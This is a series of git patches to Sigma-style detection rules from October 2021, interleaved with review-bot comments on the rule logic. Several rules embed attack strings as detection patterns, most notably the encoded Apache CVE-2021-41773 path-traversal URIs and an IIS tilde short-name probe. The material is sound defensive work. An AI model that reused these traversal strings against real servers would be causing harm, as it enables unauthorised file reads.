From: Florian Roth Date: Tue, 5 Oct 2021 17:33:37 +0200 Subject: [PATCH 1177/1367] rule: Apache Vuln CVE-2021-41773 --- ...b_cve_2021_41773_apache_path_traversal.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/web/web_cve_2021_41773_apache_path_traversal.yml diff --git a/rules/web/web_cve_2021_41773_apache_path_traversal.yml b/rules/web/web_cve_2021_41773_apache_path_traversal.yml new file mode 100644 index 00000000..b44021b3 --- /dev/null +++ b/rules/web/web_cve_2021_41773_apache_path_traversal.yml @@ -0,0 +1,28 @@ +title: CVE-2010-5278 Exploitation Attempt +id: 3007fec6-e761-4319-91af-e32e20ac43f5 +status: experimental +description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. +author: daffainfo +date: 2021/10/05 +references: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 + - https://twitter.com/ptswarm/status/1445376079548624899 + - https://twitter.com/h4x0r_dz/status/1445401960371429381 + - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml +logsource: + category: webserver +detection: + selection: + c-uri|contains: '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e' + selection_success: + sc-status: + - 200 + - 301 + condition: selection and selection_success +false_positives: + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical From 5576f5047037546b4474e6089ff571968a873e12 Mon Sep 17 00:00:00 2001 
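Review bot: The new rule file uses the key `false_positives:`, while every other rule in this series (the IIS shortname rule, the ADFS pipe rule, the VMToolsd rule) uses the Sigma key `falsepositives:`, so tooling that reads the standard key will see this rule as having no false-positive section. The line should read `falsepositives:`. The wrong CVE in the title is already corrected by the following commit, so only the key name remains to fix here.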
From: Florian Roth Date: Tue, 5 Oct 2021 17:35:09 +0200 Subject: [PATCH 1178/1367] fix: title, add my name --- rules/web/web_cve_2021_41773_apache_path_traversal.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/web/web_cve_2021_41773_apache_path_traversal.yml b/rules/web/web_cve_2021_41773_apache_path_traversal.yml index b44021b3..118ecf20 100644 --- a/rules/web/web_cve_2021_41773_apache_path_traversal.yml +++ b/rules/web/web_cve_2021_41773_apache_path_traversal.yml @@ -1,8 +1,8 @@ -title: CVE-2010-5278 Exploitation Attempt +title: CVE-2021-41773 Exploitation Attempt id: 3007fec6-e761-4319-91af-e32e20ac43f5 status: experimental description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. -author: daffainfo +author: daffainfo, Florian Roth date: 2021/10/05 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 From d9e5da6c8691e770fb25d2169711cf36d64f907c Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Tue, 5 Oct 2021 17:52:52 +0100 Subject: [PATCH 1179/1367] Use startswith for eventName selection Signed-off-by: Rachel Rice --- rules/cloud/aws/aws_attached_malicious_lambda_layer.yml | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml index 09789d35..597b668d 100644 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml 
@@ -11,13 +11,8 @@ logsource: detection: selection: eventSource: lambda.amazonaws.com - filter1: - eventName: UpdateFunctionConfiguration - filter2: - eventName: UpdateFunctionConfiguration20150331 - filter3: - eventName: UpdateFunctionConfiguration20150331v2 - condition: selection and (filter1 or filter2 or filter3) + eventName|startswith: UpdateFunctionConfiguration + condition: selection level: medium tags: - attack.privilege_escalation From 7cf01c2f0c9e02fc84da2be085092f3d9061e46f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 6 Oct 2021 12:43:10 +0200 Subject: [PATCH 1180/1367] extended CVE-2021-41773 rule --- rules/web/web_cve_2021_41773_apache_path_traversal.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_41773_apache_path_traversal.yml b/rules/web/web_cve_2021_41773_apache_path_traversal.yml index 118ecf20..04ab1634 100644 --- a/rules/web/web_cve_2021_41773_apache_path_traversal.yml +++ b/rules/web/web_cve_2021_41773_apache_path_traversal.yml 
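Review bot: After this hunk the selection is `eventSource: lambda.amazonaws.com` plus `eventName|startswith: UpdateFunctionConfiguration`, which matches every function configuration change (environment, timeout, memory, handler), not specifically a layer being attached as the rule title claims. If the CloudTrail record's `requestParameters` carries the layers list in your pipeline, the selection should narrow on it; if not, the broad match should be documented in `falsepositives` so a medium-level alert on every deploy is expected. The rest of the rule, including its `falsepositives` section, is outside this hunk.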
@@ -4,17 +4,21 @@ status: experimental description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. author: daffainfo, Florian Roth date: 2021/10/05 +modified: 2021/10/06 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml + - https://twitter.com/bl4sty/status/1445462677824761878?s=12 logsource: category: webserver detection: selection: - c-uri|contains: '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e' + c-uri|contains: + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e' + - '/icons/.%2e/%2e%2e/%2e%2e/%2e%2e' selection_success: sc-status: - 200 @@ -26,3 +30,4 @@ tags: - attack.initial_access - attack.t1190 level: critical + From dfd316c0ce2f11b223753c4ab3b8a2b8753b4f37 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 6 Oct 2021 17:46:15 +0200 Subject: [PATCH 1181/1367] Add web_iis_tilt_shortname_scan.yml --- rules/web/web_iis_tilt_shortname_scan.yml | 30 +++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/web/web_iis_tilt_shortname_scan.yml diff --git a/rules/web/web_iis_tilt_shortname_scan.yml b/rules/web/web_iis_tilt_shortname_scan.yml new file mode 100644 index 00000000..c97b5ed1 --- /dev/null +++ b/rules/web/web_iis_tilt_shortname_scan.yml 
@@ -0,0 +1,30 @@ +title: Successful IIS Shortname Fuzzing Scan +id: 7cb02516-6d95-4ffc-8eee-162075e111ac +status: experimental +author: frack113 +description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~. +references: + - https://github.com/projectdiscovery/nuclei-templates/blob/master/fuzzing/iis-shortname.yaml + - https://www.exploit-db.com/exploits/19525 + - https://github.com/lijiejie/IIS_shortname_Scanner +date: 2021/10/06 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + c-uri|contains: '~1' + c-uri|endswith: 'a.aspx' + cs-method: + - GET + - OPTIONS + #only succes + sc-status: + - 200 + - 301 + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file From 930d2d4223667564ecfcf1f91b0b3fe7ee8809d1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 6 Oct 2021 17:53:16 +0200 Subject: [PATCH 1182/1367] fix id --- rules/web/web_iis_tilt_shortname_scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_iis_tilt_shortname_scan.yml b/rules/web/web_iis_tilt_shortname_scan.yml index c97b5ed1..eebef627 100644 --- a/rules/web/web_iis_tilt_shortname_scan.yml +++ b/rules/web/web_iis_tilt_shortname_scan.yml @@ -1,5 +1,5 @@ title: Successful IIS Shortname Fuzzing Scan -id: 7cb02516-6d95-4ffc-8eee-162075e111ac +id: 7cb02516-6d95-4ffc-8eee-162075e111ac status: experimental author: frack113 description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~. From 0d04b469f77815e6d99d121c46cad8a1e3b68964 Mon Sep 17 00:00:00 2001 
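Review bot: The description and the inline comment in the new rule need a wording pass: `description: When IIS runs on an old .NET Framework it is possible to enumerate folders and files using the ~ (tilde) short-name syntax.` and `# only successful responses`. The filename says `tilt` where the technique is the tilde (~) short-name probe, which is worth fixing before the file gets referenced elsewhere. The combination `c-uri|contains: '~1'` with `c-uri|endswith: 'a.aspx'` ties the rule to the request format of one scanner template; that is fine for a medium-level rule but should be stated in the description so readers do not expect it to cover every short-name probe.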
From: frack113 Date: Thu, 7 Oct 2021 07:40:53 +0200 Subject: [PATCH 1183/1367] order powershell_classic --- .../powershell_classic_alternate_powershell_hosts.yml | 0 .../{ => powershell_classic}/powershell_classic_powercat.yml | 0 .../powershell_classic_remote_powershell_session.yml | 0 .../powershell_classic_susp_athremotefxvgpudisablementcommand.yml | 0 .../powershell_classic_susp_zip_compress.yml | 0 .../powershell_classic_suspicious_download.yml | 0 .../powershell_delete_volume_shadow_copies.yml | 0 .../{ => powershell_classic}/powershell_downgrade_attack.yml | 0 .../{ => powershell_classic}/powershell_exe_calling_ps.yml | 0 .../{ => powershell_classic}/powershell_renamed_powershell.yml | 0 .../powershell_tamper_with_windows_defender.yml | 0 .../powershell_wsman_com_provider_no_powershell.yml | 0 .../{ => powershell_classic}/powershell_xor_commandline.yml | 0 .../{ => powershell_script}/powershell_accessing_win_api.yml | 0 14 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_alternate_powershell_hosts.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_powercat.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_remote_powershell_session.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_susp_athremotefxvgpudisablementcommand.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_susp_zip_compress.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_suspicious_download.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_delete_volume_shadow_copies.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_downgrade_attack.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_exe_calling_ps.yml (100%) rename rules/windows/powershell/{ => 
powershell_classic}/powershell_renamed_powershell.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_tamper_with_windows_defender.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_wsman_com_provider_no_powershell.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_xor_commandline.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_accessing_win_api.yml (100%) diff --git a/rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml diff --git a/rules/windows/powershell/powershell_classic_powercat.yml b/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_powercat.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml diff --git a/rules/windows/powershell/powershell_classic_remote_powershell_session.yml b/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_remote_powershell_session.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml 
diff --git a/rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_classic/powershell_classic_susp_athremotefxvgpudisablementcommand.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_susp_athremotefxvgpudisablementcommand.yml diff --git a/rules/windows/powershell/powershell_classic_susp_zip_compress.yml b/rules/windows/powershell/powershell_classic/powershell_classic_susp_zip_compress.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_susp_zip_compress.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_susp_zip_compress.yml diff --git a/rules/windows/powershell/powershell_classic_suspicious_download.yml b/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_suspicious_download.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml diff --git a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml similarity index 100% rename from rules/windows/powershell/powershell_delete_volume_shadow_copies.yml rename to rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml diff --git a/rules/windows/powershell/powershell_downgrade_attack.yml b/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml similarity index 100% rename from rules/windows/powershell/powershell_downgrade_attack.yml rename to rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml 
diff --git a/rules/windows/powershell/powershell_exe_calling_ps.yml b/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml similarity index 100% rename from rules/windows/powershell/powershell_exe_calling_ps.yml rename to rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml diff --git a/rules/windows/powershell/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml similarity index 100% rename from rules/windows/powershell/powershell_renamed_powershell.yml rename to rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml diff --git a/rules/windows/powershell/powershell_tamper_with_windows_defender.yml b/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml similarity index 100% rename from rules/windows/powershell/powershell_tamper_with_windows_defender.yml rename to rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml diff --git a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml b/rules/windows/powershell/powershell_classic/powershell_wsman_com_provider_no_powershell.yml similarity index 100% rename from rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml rename to rules/windows/powershell/powershell_classic/powershell_wsman_com_provider_no_powershell.yml diff --git a/rules/windows/powershell/powershell_xor_commandline.yml b/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml similarity index 100% rename from rules/windows/powershell/powershell_xor_commandline.yml rename to rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml 
diff --git a/rules/windows/powershell/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml similarity index 100% rename from rules/windows/powershell/powershell_accessing_win_api.yml rename to rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml From 0ee777e3b427c8e48d4dfd9a516c4b7581b37995 Mon Sep 17 00:00:00 2001 From: Mika Luhta <12100880+mluhta@users.noreply.github.com> Date: Thu, 7 Oct 2021 14:25:18 +0300 Subject: [PATCH 1184/1367] Fix rule detection logic Changed ParentImage to Image --- rules/windows/process_creation/win_susp_regsvr32_no_dll.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml index 021e88fb..b97d80b7 100644 --- a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml @@ -15,7 +15,7 @@ logsource: product: windows detection: selection: - ParentImage|endswith: '\regsvr32.exe' + Image|endswith: '\regsvr32.exe' filter: CommandLine|contains: - '.dll' From e70d17745ef89c6d2e20c9a0a88d8fe7d26a9bea Mon Sep 17 00:00:00 2001 From: Mika Luhta <12100880+mluhta@users.noreply.github.com> Date: Thu, 7 Oct 2021 18:42:22 +0200 Subject: [PATCH 1185/1367] Update modified field --- rules/windows/process_creation/win_susp_regsvr32_no_dll.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml index b97d80b7..790363fa 100644 --- a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml 
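Review bot: Switching the selection from `ParentImage|endswith` to `Image|endswith: '\regsvr32.exe'` is the right fix, but the exclusion `filter` that follows (`CommandLine|contains: - '.dll'`, continuing outside the hunk) is now what decides the false-positive rate, and regsvr32 also legitimately registers `.ocx` and `.ax` components. If those extensions are not already in the filter list, adding `- '.ocx'` and `- '.ax'` avoids alerting on routine control registration. The rule's description (visible in the next commit's context) still says `regsvr.exe` where `regsvr32.exe` is meant.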
@@ -4,7 +4,7 @@ status: experimental description: Detects a regsvr.exe execution that doesn't contain a DLL in the command line author: Florian Roth date: 2019/07/17 -modified: 2021/07/20 +modified: 2021/10/07 references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ tags: From 7f17eaeb87019370134b4ac3cdd6f8812a9c7c65 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 8 Oct 2021 01:57:22 -0400 Subject: [PATCH 1186/1367] added rule to detect suspicious named pipe connections to an AD FS server --- .../sysmon_susp_adfs_namedpipe_connection.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/pipe_created/sysmon_susp_adfs_namedpipe_connection.yml diff --git a/rules/windows/pipe_created/sysmon_susp_adfs_namedpipe_connection.yml b/rules/windows/pipe_created/sysmon_susp_adfs_namedpipe_connection.yml new file mode 100644 index 00000000..f1bc4e86 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_susp_adfs_namedpipe_connection.yml 
@@ -0,0 +1,33 @@ +title: ADFS Database Named Pipe Connection +id: 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3 +description: Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens. +status: experimental +date: 2021/10/08 +modified: 2021/10/08 +author: Roberto Rodriguez @Cyb3rWard0g +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml + - https://o365blog.com/post/adfs/ + - https://github.com/Azure/SimuLand +tags: + - attack.collection + - attack.t1005 +logsource: + product: windows + service: pipe_connected +detection: + selection: + PipeName: '\MICROSOFT##WID\tsql\query' + filter: + Image|endswith: + - 'Microsoft.IdentityServer.ServiceHost.exe' + - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe' + - 'AzureADConnect.exe' + - 'Microsoft.Tri.Sensor.exe' + - 'wsmprovhost.exe' + - 'mmc.exe' + - 'sqlservr.exe' + condition: selection and not filter +falsepositives: + - Processes in the filter condition +level: critical \ No newline at end of file From a45e516f993896e4557c7139aa81d87d0d038400 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Fri, 8 Oct 2021 13:28:35 +0545 Subject: [PATCH 1187/1367] Added rule for possible persistence via VMTools --- .../sysmon_vmtoolsd_susp_child_process.yml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml diff --git a/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml b/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml new file mode 100644 index 00000000..3a7ddb28 --- /dev/null +++ b/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml 
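Review bot: The `Image|endswith` values in the `filter` map have no leading backslash, so `'mmc.exe'` also matches any image whose name merely ends in that string (for example a renamed `xmmc.exe`), and the same applies to the other six entries; the VMToolsd rule later in this series uses the `'\cmd.exe'` form, which is the safer convention, e.g. `- '\mmc.exe'`. The `logsource` declares `service: pipe_connected`, while the file lives under `rules/windows/pipe_created/`; the Sigma taxonomy describes Sysmon pipe events as `category: pipe_created` with `product: windows`, so this rule will likely not be picked up by the existing pipe mapping unless the logsource is aligned with the directory. The `date` and `modified` values are identical, which is harmless on a new rule but normally only `date` is set at creation.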
@@ -0,0 +1,39 @@ +title: VMToolsd Suspicious Child Process +id: 5687f942-867b-4578-ade7-1e341c46e99a +status: experimental +description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup +tags: + - attack.execution + - attack.persistence + - attack.t1059 +author: behops, Bhabesh Raj +date: 2021/10/08 +references: + - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ +fields: + - CommandLine + - ParentCommandLine + - Details +falsepositives: + - Legitimate use by adminstrator +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + ParentImage|endswith: '\vmtoolsd.exe' + Image|endswith: + - '\cmd.exe' + - '\powershell.exe' + - '\rundll32.exe' + - '\regsvr32.exe' + - '\wscript.exe' + - '\cscript.exe' + filter: + CommandLine|contains: + - 'poweron-vm-default.bat' + - 'poweroff-vm-default.bat' + - 'resume-vm-default.bat' + - 'suspend-vm-default.bat' + condition: selection and not filter From 04c37d977bc22b84cb8689fecda9bf7aabfa2118 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 8 Oct 2021 16:36:34 +0200 Subject: [PATCH 1188/1367] fix: prevent FP triggering of other sources utilising ID 1102 --- rules/windows/builtin/win_event_log_cleared.yml | 2 ++ rules/windows/builtin/win_susp_eventlog_cleared.yml | 5 +++-- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 92c9a2ea..992e3711 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -5,6 +5,7 @@ description: Checks for event id 1102 which indicates the security event log was references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SecurityEventLogCleared.yaml date: 2021/08/15 +modified: 2021/10/08 author: Saw Winn Naung level: medium logsource: 
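Review bot: The `filter` excludes any command line that merely contains the script name (`CommandLine|contains: - 'poweron-vm-default.bat'` and three siblings), so any command line carrying that substring anywhere is exempted from the rule; anchoring the exclusion to the directory the legitimate VMware Tools scripts are installed from would keep the exemption as narrow as the legitimate case, with the exact path to be confirmed against a host. Two metadata lines need attention: `author: behops, Bhabesh Raj` appears to be a typo for the referenced bohops.com author, and `- Legitimate use by adminstrator` should read `- Legitimate use by administrator`. `fields: - Details` is unusual for a `process_creation` rule, where `Details` is not a documented field; presumably it was copied from a registry rule and can be dropped. The 1188 hunk sharing this line only bumps a `modified` date and needs no comment.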
@@ -16,6 +17,7 @@ tags: detection: selection: EventID: 1102 + Source: Microsoft-Windows-Eventlog condition: selection fields: - SubjectLogonId diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 454919e5..02b08252 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -9,7 +9,7 @@ references: - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 author: Florian Roth date: 2017/01/10 -modified: 2021/09/21 +modified: 2021/10/08 tags: - attack.defense_evasion - attack.t1070 # an old one @@ -23,8 +23,9 @@ detection: EventID: - 517 - 1102 + Source: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) -level: high \ No newline at end of file +level: high From fe7fbfd5fca17b13db0683f0e1fa65b635678c82 Mon Sep 17 00:00:00 2001 
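Review bot: In the `win_susp_eventlog_cleared.yml` hunk (`@@ -23,8 +23,9 @@`), adding `Source: Microsoft-Windows-Eventlog` to the same selection that lists `EventID: - 517 - 1102` makes the 517 branch unreachable: on the pre-Vista systems that still emit 517, the audit-log-cleared event is, as far as I recall, written with source `Security`, not `Microsoft-Windows-Eventlog`, so the AND with `Source` never holds for it. Either split the selection into a 1102 selection that carries the `Source` constraint and a separate 517 selection, or drop 517 and say so in the description. The same `Source` line added to `win_event_log_cleared.yml` in the first hunk on this line is fine, since that rule matches 1102 only.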
From: frack113 Date: Sat, 9 Oct 2021 09:50:49 +0200 Subject: [PATCH 1189/1367] order powershell_module --- .../powershell_alternate_powershell_hosts.yml | 2 +- .../powershell_bad_opsec_artifacts.yml | 20 ++++++---------- .../powershell_clear_powershell_history.yml | 24 +++++-------------- .../powershell_decompress_commands.yml | 13 +++++----- .../powershell_get_clipboard.yml | 13 +++++----- .../powershell_invoke_obfuscation_clip.yml | 15 ++++++------ ...hell_invoke_obfuscation_obfuscated_iex.yml | 21 ++++++---------- .../powershell_invoke_obfuscation_stdin.yml | 14 +++++------ .../powershell_invoke_obfuscation_var.yml | 15 ++++++------ ...rshell_invoke_obfuscation_via_compress.yml | 15 ++++++------ ...wershell_invoke_obfuscation_via_rundll.yml | 15 ++++++------ ...owershell_invoke_obfuscation_via_stdin.yml | 14 +++++------ ...rshell_invoke_obfuscation_via_use_clip.yml | 14 +++++------ ...shell_invoke_obfuscation_via_use_mhsta.yml | 15 ++++++------ ...ll_invoke_obfuscation_via_use_rundll32.yml | 15 ++++++------ .../powershell_invoke_obfuscation_via_var.yml | 16 ++++++------- .../powershell_powercat.yml | 0 .../powershell_remote_powershell_session.yml | 2 +- ...susp_athremotefxvgpudisablementcommand.yml | 0 .../powershell_susp_zip_compress.yml | 18 ++++++-------- 20 files changed, 119 insertions(+), 142 deletions(-) rename rules/windows/powershell/{ => powershell_module}/powershell_alternate_powershell_hosts.yml (94%) rename rules/windows/powershell/{ => powershell_module}/powershell_bad_opsec_artifacts.yml (73%) rename rules/windows/powershell/{ => powershell_module}/powershell_clear_powershell_history.yml (58%) rename rules/windows/powershell/{ => powershell_module}/powershell_decompress_commands.yml (70%) rename rules/windows/powershell/{ => powershell_module}/powershell_get_clipboard.yml (70%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_clip.yml (62%) rename rules/windows/powershell/{ => 
powershell_module}/powershell_invoke_obfuscation_obfuscated_iex.yml (59%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_stdin.yml (63%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_var.yml (61%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_compress.yml (61%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_rundll.yml (64%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_stdin.yml (64%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_use_clip.yml (64%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_use_mhsta.yml (63%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_use_rundll32.yml (63%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_var.yml (62%) rename rules/windows/powershell/{ => powershell_module}/powershell_powercat.yml (100%) rename rules/windows/powershell/{ => powershell_module}/powershell_remote_powershell_session.yml (90%) rename rules/windows/powershell/{ => powershell_module}/powershell_susp_athremotefxvgpudisablementcommand.yml (100%) rename rules/windows/powershell/{ => powershell_module}/powershell_susp_zip_compress.yml (63%) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml similarity index 94% rename from rules/windows/powershell/powershell_alternate_powershell_hosts.yml rename to rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml index d3ce9723..fb409b13 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml 
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: ModuleLogging must be enable + definition: Module Logging must be enable detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml similarity index 73% rename from rules/windows/powershell/powershell_bad_opsec_artifacts.yml rename to rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml index 64bc41c2..dcb92bd0 100644 --- a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml @@ -1,5 +1,8 @@ title: Bad Opsec Powershell Code Artifacts -id: 73e733cc-1ace-3212-a107-ff2523cc9fc3 +id: 8d31a8ce-46b5-4dd6-bdc3-680931f1db86 +related: + - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3 + type: derived description: Focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec. status: experimental references: @@ -8,7 +11,7 @@ references: - https://www.mdeditor.tw/pl/pgRt author: 'ok @securonix invrep_de, oscd.community' date: 2020/10/09 -modified: 